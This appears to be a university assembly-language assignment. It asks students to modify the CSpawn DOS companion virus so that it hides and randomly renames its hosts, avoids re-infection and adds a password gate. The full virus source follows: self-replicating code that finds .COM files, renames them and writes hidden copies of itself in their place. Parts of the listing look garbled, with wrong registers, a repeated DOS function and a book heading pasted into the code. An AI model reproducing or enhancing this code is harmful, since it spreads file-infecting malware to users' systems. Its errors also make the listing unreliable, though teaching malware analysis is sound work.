Implementation requirements (all mandatory)

• use only instructions for the x8086 processors on 16 bits

• implement at least 1 new procedure for each team member (the procedure must receive
at least 1 input arguments (pointers or values) on stack and must return a result by the
stack orby a register – NO global variables

• no compiler errors with TASM or TLINK

For the task:

1. Rewrite the INFECT_FILE routine to give the host a random name and make it a
hidden file. Furthermore, make the viral program visible, but make sure you
come up with a strategy to avoid re-infection at the level of the FIND_FILES
routine so that INFECT_FILE is never even called to infect something that should
not be infected.
2. Add a routine to CSpawn which will demand a password before executing the
host and will exit without executing the host if it doesn’t get the right password.
You can hard-code the required password. The password will be different for
each infected file and will be generated based on the host name (you can
choose the pattern)

The SPAWNR Virus Listing

The following virus can be assembled into a COM file by MASM, TASM, or A86 and executed
directly.

; The CSpawn virus is a simple companion virus to illustrate how a companion virus works.
; (C) 1994 American Eagle Publications, Inc. All Rights Reserved!

.model tiny

.code

org 0100h

CSpawn:

mov sp,OFFSET FINISH + 100H ; Change top of stack

 mov ah,4AH ; DOS resize memory fctn

mov bx,sp

mov cl,4

shr bx,cl

inc bx ; BX = # of para to keep

int 21H

mov bx,2CH ; set up EXEC param block

mov ax,[bx]

mov WORD PTR [PARAM_BLK],ax ; environment segment

mov ax,cs

mov WORD PTR [PARAM_BLK+4],ax ; # of parameter string

mov WORD PTR [PARAM_BLK+8],ax ; # of FCB1

mov WORD PTR [PARAM_BLK+12],ax ; # of FCB2

mov dx,OFFSET REAL_NAME ; prep to EXEC

COMPANION VIRUSES

mov bx,OFFSET PARAM_BLK

mov ax,4B00H

int 21H ;execute host

cli

mov bx,ax ;save return code here

mov ax,cs ;AX holds code segment

mov ss,ax ;restore stack first

mov sp,(FINISH - CSpawn) + 200H

sti

push bx

mov ds,ax ;Restore data segment

mov es,ax ;Restore extra segment

mov ah,1AH ;DOS set DTA function

mov dx,80H ;put DTA at offset 80H

int 21H

call FIND_FILES ;Find and infect files

pop ax ;AL holds return value

mov ah,4CH ;DOS terminate function

int 21H ;bye-bye

; The following routine searches for COM files and infects them

FIND_FILES:

mov bx,OFFSET COM_MASK ; search for COM files

mov ah,4EH ; DOS find first file function

xor cx,cx ; CX holds all file attributes

int 21h

FIND_LOOP:

jc FIND_DONE ; Exit if no files found

call INFECT_FILE ; Infect the file!

mov ah,4EH ; DOS find next file function

jmp FIND_LOOP ; Try finding another file

FIND_DONE:

ret ; Return to caller

COM_MASK db '*.COM',0 ; COM file search mask

; This routine infects the file specified in the DTA.

INFECT_FILE:

mov si,9EH ; DTA + 1EH

mov di,OFFSET REAL_NAME ; DI points to new name

INF_LOOP:

lodsb ; load a character

stosb ; and save it in buffer

or al,al ;is it a NULL?

jnz INF_LOOP ; if so then leave the loop

mov WORD PTR [di-2] , 'N' ;change name to CON & add 0
mov dx,9EH ;DTA + 1EH
mov di,OFFSET REAL_NAME
mov ah,56H ;rename original file
int 21H

jc INF_EXIT ; if can't rename, already done

mov ah,3CH ; DOS create file function

mov cx,2 ; set hidden attribute

int 21H

mov bx,ax ; BX holds file handle

mov ah,40H ; DOS write to file function

mov cx,FINISH - CSpawn ; CX holds virus length

mov dx,OFFSET CSpawn ; DX points to CSpawn of virus

int 21H
 mov ah,3EH ; DOS close file function

int 21h

INF_EXIT:

ret

REAL_NAME db 13 dup (?) ; Name of host to execute

; DOS EXEC function parameter block

PARAM_BLK DW ? ; environment segment

DD 80H ; # of command line

DD 5CH ; # of first PCB

DD 6CH ; # of second PCB

FINISH:

end CSpawn